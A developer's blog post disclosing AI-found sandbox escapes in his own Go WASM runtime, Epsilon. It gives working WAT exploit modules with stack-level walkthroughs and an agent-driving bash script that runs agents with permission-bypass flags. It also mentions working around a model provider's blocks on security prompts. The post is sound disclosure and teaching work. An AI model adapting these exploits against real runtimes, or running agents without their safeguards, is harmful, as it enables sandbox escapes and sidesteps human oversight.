# All the Bugs They Found

> Source: <https://andreapivetta.com/posts/all-the-bugs-they-found.html>
> Published: 2026-05-19 10:33:35+00:00

Last year I wrote a small WASM runtime in Go,
[Epsilon](https://github.com/ziggy42/epsilon). As far as runtimes go, this is
a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code.
It is also very extensively tested against the
[official WASM testsuite](https://github.com/WebAssembly/testsuite).

Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code.

How many security vulnerabilities do you think AI agents found in it?

**More than 20.**

Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere.

A handful, though, were properly interesting: sandbox escapes that let a malicious
[WASM module](https://developer.mozilla.org/en-US/docs/WebAssembly/Guides/Concepts#webassembly_key_concepts)
break out of its isolation and reach into another module's private state. These are my
favorites.

## Background

A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported (and imported) objects. Unexported functions, memories, etc., are private to the module that defined them.

WASM is a typed stack machine, but the type checking does not happen at runtime: before
execution, a validator walks the bytecode and verifies that at any point the values on
the stack have the expected type. For example, a module that tried to `local.set` an
`i32` into a `funcref` local would be rejected before it ever started running. Epsilon
then executes blindly, trusting the validator's earlier checks.

Thanks to the type guarantees provided by the validator, a `funcref` at runtime in
Epsilon is represented as an `int32`: `-1` is the null sentinel, and any non-negative
value is an index into the global function store, shared across all modules instantiated
in the runtime. As a result, the constant `0` and a `funcref` pointing to the first
function in the store are indistinguishable during execution. This simplifies the
implementation and improves performance, at the cost of delegating safety entirely to
the validator.
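To make the ambiguity concrete, here is a minimal sketch of that representation. The names `nullFuncRef` and `isNullRef` are made up for illustration and are not taken from Epsilon's source; only the `-1` sentinel and the `int32` encoding come from the description above.

```go
package main

import "fmt"

// nullFuncRef is the sentinel described above: -1 means "null funcref".
// The name is hypothetical.
const nullFuncRef int32 = -1

// isNullRef is what a ref.is_null check reduces to under this encoding.
func isNullRef(v int32) bool {
	return v == nullFuncRef
}

func main() {
	var plainZero int32 = 0 // an ordinary i32 constant
	var firstFunc int32 = 0 // a funcref to store index 0

	fmt.Println(plainZero == firstFunc)  // true: same bits, no type tag
	fmt.Println(isNullRef(firstFunc))    // false: 0 is a live reference
	fmt.Println(isNullRef(nullFuncRef))  // true
}
```

Nothing at runtime distinguishes the two zeros, so any path that lets an integer land where a funcref is expected turns that integer into a callable reference.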

Each attacker module in the following sections runs alongside the same victim module:

```
(module
  (func $secret (result i32)   ;; declares a function $secret: takes no parameters,
                               ;; returns a 32-bit integer. Private, never exported
    i32.const 1337             ;; pushes 1337 onto the stack; becomes the return value
  )
)
```

Since `$secret` is the first function instantiated into the runtime, it lives at store
index 0. The goal of each attacker module is to get the VM to call it, returning `1337`,
despite never being given a legitimate `funcref` to it.

## 1. Zero Is Not Null

The simplest of the three. Here's the attacker:

```
(module
  (type $t (func (result i32)))   ;; the call_indirect type signature
  (table 1 funcref)               ;; a table of size 1 (essentially an array of funcrefs).
                                  ;; Identified by its module-level index, which is 0
                                  ;; here since it's the first (and only) table declared

  (func (export "exploit") (result i32)
    (local $f funcref)            ;; declared, never assigned;
                                  ;; per spec, ref locals default to null

    i32.const 0                   ;; the slot in the table where we'll write
                                  ;; stack: [0]
    local.get $f                  ;; push $f's value (null)
                                  ;; stack: [0, null]
    table.set 0                   ;; immediate 0 picks which table to write to
                                  ;; (tables[0]); pops two values from the stack:
                                  ;; first the funcref (null), then the slot index.
                                  ;; Writes tables[0][0] = null
                                  ;; stack: []

    i32.const 0                   ;; the slot in the table to fetch from next
                                  ;; stack: [0]
    call_indirect (type $t)       ;; pop the slot, fetch tables[0][slot] (null),
                                  ;; and call it
  )
)
```

The `exploit` function, while perfectly valid WASM, should trap at runtime. The local
`$f` is uninitialized, therefore null. `call_indirect` should fail.

Except that in Epsilon, it didn't. It called `$secret` instead.

The culprit was how locals were initialized. When a function is called, the spec
requires locals to be initialized to their default values: zero for numeric and vector
types, but null for reference types. Epsilon achieved this by zeroing all non-parameter
locals using Go's `clear()`:

```
// Clear non-parameter locals to their zero values.
clear(locals[numParams:])
```

This was idiomatic and fast, but Go's `clear()` sets every element to its zero value,
`0`. Per our funcref representation, that's not null (`-1`): it's the store index of
`$secret`. When `exploit` was called, rather than trapping on a null `call_indirect`,
the VM called the function at store index 0.
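One way to close this gap is to initialize locals by type instead of zeroing them wholesale. The sketch below is an assumption about what such a fix could look like, not Epsilon's actual patch: the `valueType` tags, the `initLocals` helper, and the use of a bare `int32` per local are all simplifications invented for the example.

```go
package main

import "fmt"

// valueType is a hypothetical type tag; Epsilon's real types may differ.
type valueType int

const (
	typeI32 valueType = iota
	typeFuncRef
)

// nullRef is the -1 null sentinel described in the Background section.
const nullRef int32 = -1

// initLocals sets each non-parameter local to its spec default:
// 0 for numeric types, the null sentinel for reference types.
func initLocals(locals []int32, types []valueType, numParams int) {
	for i := numParams; i < len(locals); i++ {
		if types[i] == typeFuncRef {
			locals[i] = nullRef
		} else {
			locals[i] = 0
		}
	}
}

func main() {
	types := []valueType{typeI32, typeI32, typeFuncRef}
	locals := []int32{7, 99, 99} // one parameter, two stale locals
	initLocals(locals, types, 1)
	fmt.Println(locals) // [7 0 -1]
}
```

The per-type loop is slower than a single `clear()`, which is the trade-off the original code was avoiding.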

## 2. Phantom Block Parameter

This one combines two separate bugs:

```
(module
  (type $t (func (result i32)))
  (table 1 funcref)

  (func (export "exploit") (result i32)
    (local $f funcref)

    ref.null func               ;; push a null funcref onto the stack
    i32.const 0

    (block (param i32)          ;; block consumes the i32 from the stack...
      drop                      ;; ...and immediately drops it
    )

    local.set $f                ;; store top of stack into $f (the null funcref)
    local.get $f
    ref.is_null                 ;; is $f null?

    if (result i32)
      i32.const 42              ;; expected path: $f was null, return 42
    else                        ;; unreachable path: $f is always null
      i32.const 0
      local.get $f
      table.set 0
      i32.const 0
      call_indirect (type $t)
    end
  )
)
```

In any correct WASM implementation (and indeed in the latest version of Epsilon),
`exploit` returns `42`, as expected. In the vulnerable versions of Epsilon, it returned
`1337` instead.

### Stack Height Misalignment

During their execution, control-flow blocks (`block`, `loop`, `if`) may consume inputs
from the stack and produce results on it. At the end of execution the stack must look
exactly as the block's signature describes: N_params consumed, N_results pushed in their
place. Anything the body left in between has to be discarded, so the runtime needs to
know how high the stack was when entering the block.

In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack:

```
vm.pushControlFrame(frame, controlFrame{
    stackHeight: vm.stack.size(),   // height at block entry
    // ...
})
```

But here lies the first bug: that line captures the stack height
*after* the block's parameters are already pushed. In WASM, parameters are
*consumed* by the block: they belong to the block, not to the surrounding scope.
So the validator and the VM now disagree by exactly N parameters about where "the bottom
of the block" is on the stack.
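The arithmetic that reconciles the two views is small. The following is a sketch under the assumption that the frame stores the height the stack is unwound to; `enterBlock` and this pared-down `controlFrame` are hypothetical and only mirror the `stackHeight` field quoted above.

```go
package main

import "fmt"

// controlFrame is a pared-down, hypothetical stand-in for Epsilon's frame.
type controlFrame struct {
	stackHeight uint32 // height the stack is unwound to when the block ends
}

// enterBlock records the base of a block: the current height minus the
// parameters the block consumes. For validated code at least numParams
// values are present, so the subtraction does not underflow.
func enterBlock(currentHeight, numParams uint32) controlFrame {
	return controlFrame{stackHeight: currentHeight - numParams}
}

func main() {
	// The exploit's block: stack is [null_funcref, 0], one i32 parameter.
	frame := enterBlock(2, 1)
	fmt.Println(frame.stackHeight) // 1, matching the validator's view
}
```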

### Memory Resurrection

When a block ends, the VM calls `unwind` to restore the stack to its declared, pre-block
height. `targetHeight` is the stack height recorded in the `controlFrame` structure.

```
func (s *valueStack) unwind(targetHeight, preserveCount uint32) {
    valuesToPreserve := s.data[s.size()-preserveCount:]
    s.data = s.data[:targetHeight]
    s.data = append(s.data, valuesToPreserve...)
}
```

Because of the stack height misalignment bug above, `targetHeight` is too high: it
counts the block's parameters as if they were still on the stack. Therefore
`s.data[:targetHeight]` causes the slice to grow back rather than be truncated. As long
as `targetHeight <= cap(s.data)`, Go is happy to re-expose whatever was sitting in the
backing array.

Parameters that the validator considered consumed are now resurrected on top of the stack.
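The re-slicing behavior is easy to reproduce outside the VM. This standalone sketch reimplements `unwind` on a plain `[]int32` (the free-function form and the `afterBlock` helper are made up for the demo) and uses `7` rather than `0` as the block parameter, so the resurrected value cannot be mistaken for zeroed memory.

```go
package main

import "fmt"

// unwind follows the shape of the function quoted above, on a plain slice.
func unwind(data []int32, targetHeight, preserveCount int) []int32 {
	keep := data[len(data)-preserveCount:]
	data = data[:targetHeight] // grows the slice when targetHeight > len(data)
	return append(data, keep...)
}

// afterBlock pushes two values, drops the top one (as the block body does),
// then unwinds to targetHeight with no results to preserve.
func afterBlock(targetHeight int) []int32 {
	stack := make([]int32, 0, 8)
	stack = append(stack, -1, 7) // a null funcref, then the block parameter
	stack = stack[:len(stack)-1] // drop: len is 1, but 7 stays in the array
	return unwind(stack, targetHeight, 0)
}

func main() {
	fmt.Println(afterBlock(2)) // [-1 7]: the dropped value is back
	fmt.Println(afterBlock(1)) // [-1]: the height the validator expects
}
```

A slice expression only panics when the upper bound exceeds the capacity, not the length, which is why the too-high `targetHeight` went unnoticed.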

### Bugs Collide

Let's walk through the `exploit` function with both bugs in mind:

```
(func (export "exploit") (result i32)
  (local $f funcref)

  ref.null func        ;; stack: [null_funcref]
  i32.const 0          ;; 0 is the index where $secret happens to sit in the
                       ;; global function store, since it was the very first
                       ;; function instantiated
                       ;; stack: [null_funcref, 0]

  (block (param i32)   ;; bug #1: VM records stackHeight = 2; the validator,
                       ;; treating the i32 as consumed (per spec), records 1
    drop               ;; pops and discards the top of the stack (the 0)
                       ;; stack: [null_funcref]
  )                    ;; bug #2: `end` calls unwind, which sets s.data to
                       ;; s.data[:2], so len 1 grows back to 2, and the 0 we
                       ;; dropped resurrects on top. The top is now an int32
                       ;; of value 0, but the validator still thinks it's a
                       ;; funcref
                       ;; stack: [null_funcref, 0]

  local.set $f         ;; 0 is put in $f, which should be a funcref. Since
                       ;; Epsilon's internal representation of funcref is also
                       ;; an int32, this works at runtime
  local.get $f         ;; stack: [null_funcref, 0]
  ref.is_null          ;; null is -1, so 0 isn't null; pops the funcref and
                       ;; pushes 0 (false). The top of the stack visually
                       ;; still looks like 0, but its type changed from
                       ;; funcref to i32
                       ;; stack: [null_funcref, 0 (i32 false)]

  if (result i32)      ;; pops the i32 condition (0, false), so the else
                       ;; branch fires
                       ;; stack: [null_funcref]
    i32.const 42       ;; not taken
  else
    i32.const 0        ;; the slot index for the upcoming table.set
                       ;; stack: [null_funcref, 0]
    local.get $f       ;; the funcref value to store (actually the int32 0)
                       ;; stack: [null_funcref, 0, 0]
    table.set 0        ;; pops the funcref then the slot index; both are 0,
                       ;; so tables[0][0] now holds the integer 0 dressed as
                       ;; a funcref
                       ;; stack: [null_funcref]
    i32.const 0        ;; the slot index within the table to look up
                       ;; stack: [null_funcref, 0]
    call_indirect (type $t)
                       ;; pops the slot index, fetches tables[0][0] (our
                       ;; int 0 dressed as a funcref), which points at
                       ;; store[0] = $secret. Call it.
  end
)
```

A perfectly valid WASM module just called an unexported function from another module. By choosing a different integer, it could reach any private function in Epsilon's global store.

## 3. Ghost in the Stack

The first two exploits relied on the validator and VM disagreeing about values on the
stack inside the sandbox. This one shifts category: the disagreement is between a host
function's *declared* signature and what it *actually* returns at runtime.

```
(module
  (type $t (func (result i32)))
  (import "env" "leak" (func $leak (result funcref)))   ;; the host must provide env.leak
  (table 1 funcref)

  (func (export "exploit") (result i32)
    i32.const 0          ;; slot index within the table
    i32.const 0          ;; index of $secret in the global function store

    call $leak           ;; declared to return a funcref; the validator thinks
                         ;; the stack gains one new value after this call

    table.set 0          ;; store the "result" (actually our 0) into the table
    i32.const 0
    call_indirect (type $t)
    return
  )
)
```

For this exploit to land, the host needs to provide a function `env.leak` whose runtime
behavior diverges from its signature: one that returns *fewer* results than promised.

In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature:

```
res := fun.hostCode(fun.module, args...)
vm.stack.pushAll(res)
```

If `leak` returned an empty slice instead of the promised funcref, `pushAll` did
nothing. The validator believed a funcref had been pushed. Instead, the stack was
unchanged.

The two `0`s pushed before `$leak` were still on the stack. The VM ran `table.set 0` and
popped them: one as the funcref, one as the slot index. `tables[0][0]` now held the
integer 0. `call_indirect` fetched it and happily called the function at index 0,
`$secret`.

## Methodology

I used a combination of approaches to find these bugs, starting with a script similar to
the one described in the
[Black-hat LLMs](https://youtu.be/1sd26pWhfmg?t=307)
talk:

``` bash
#!/bin/bash

# Directory to store vulnerability reports
VULN_DIR="vulnerabilities"
mkdir -p "$VULN_DIR"

# List of areas to investigate
AREAS=(
    "epsilon/parser.go"
    "epsilon/validation.go"
    "epsilon/vm.go"
    "epsilon/memory.go"
    "epsilon/imports.go"
    "wasip1/wasi_resources.go"
    "wasip1/wasi_poll.go"
    "wasip1/wasi_unix.go"
)

PROMPT_TEMPLATE="You are an expert security researcher and exploit developer.

STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN_DIR/' directory. Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes in '$VULN_DIR/' only.

Your task is to objectively investigate the following file for security vulnerabilities: %s

Explore the file and any related files, data structures, or interactions it depends on. Where relevant, check behavior against the WebAssembly 2.0 specification (https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf) and the WASI Preview 1 specification — a deviation from spec in security-sensitive code is itself a vulnerability. Do not flag missing features from specs beyond WebAssembly 2.0.

Do not assume a vulnerability exists. If after thorough investigation you find nothing exploitable, state so clearly and stop.

If you confirm a vulnerability:
1. Create a dedicated directory: '$VULN_DIR/<vulnerability_name>/'
2. Write 'README.md' with: root cause, impact, and reproduction steps
3. Write a PoC exploit: a concrete, runnable demonstration (Go test, .wasm file, or script) that proves the vulnerability is triggerable by a malicious WebAssembly module without any special host configuration"

# Get agent from command line, default to claude
AGENT=${1:-claude}

if [ "$AGENT" == "claude" ]; then
    AGENT_CMD="claude --dangerously-skip-permissions"
elif [ "$AGENT" == "gemini" ]; then
    AGENT_CMD="gemini --yolo"
elif [ "$AGENT" == "vibe" ]; then
    AGENT_CMD="vibe --trust"
else
    echo "Usage: $0 [claude|gemini|vibe]"
    exit 1
fi

for AREA in "${AREAS[@]}"; do
    echo "--------------------------------------------------"
    echo "Starting investigation of area: $AREA using $AGENT"
    echo "--------------------------------------------------"

    CURRENT_PROMPT=$(printf "$PROMPT_TEMPLATE" "$AREA")

    $AGENT_CMD -p "$CURRENT_PROMPT"

    echo "Finished investigation of $AREA."
    echo "Sleeping for 10 seconds to respect rate limits..."
    sleep 10
done
```

Then I moved to a
[skill](https://github.com/ziggy42/epsilon/blob/main/.agents/skills/security-audit/SKILL.md)
instead, which is slightly more convenient.

I'm honestly not sure which one is better, as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise for the reader.

To work around token limits, I also used a variety of models, mainly:

- Gemini 3 Flash
- Gemini 3.1 Pro
- Opus 4.7

Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning.

Trying to work around Anthropic blocking security-related prompts does get pretty tiring though.

## Closing thoughts

Epsilon is a weekend hobby project, so I went in expecting agents to find
*something*. It was still astonishing to see some of these issues. Bug #2 in
particular is pretty cool.

Please update to version
[0.1.0](https://github.com/ziggy42/epsilon/blob/main/CHANGELOG.md#010---2026-05-19).
